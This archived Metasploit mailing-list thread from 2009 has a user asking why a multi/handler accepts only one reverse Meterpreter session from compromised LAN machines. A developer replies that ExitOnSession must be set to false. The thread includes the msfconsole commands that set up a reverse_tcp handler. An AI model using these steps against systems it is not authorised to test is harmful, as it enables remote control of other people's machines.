Metasploit mailing list archives

Re: exploit -j command


From: egypt () metasploit com
Date: Thu, 10 Dec 2009 23:06:53 -0700

You need to set ExitOnSession false to handle more than one session
with handler.

egypt

On Thu, Dec 10, 2009 at 8:17 PM, Jeffs <jeffs () speakeasy net> wrote:
running a reverse_tcp binary on two separate local area network machines
192.168.1.101 and 192.168.1.102 and having them reverse connect to the
attacher at 192.168.1.100 that is running a multi/handler session as such:

exploit  -j

and getting the prompt on the attacker:

resource> use multi/handler
resource> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource> set lhost 192.168.1.100
lhost => 192.168.1.100
resource> set lport 4444
lport => 4444
msf exploit(handler) >

I can connect from one of the compromised machines, but need to launch a
separate instance of MSF to capture the incoming connection from the second
machine.
I thought I could launch one instance of an msf server and have multiple
incoming connections.

Am I wrong in that assumption?



_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework


Current thread: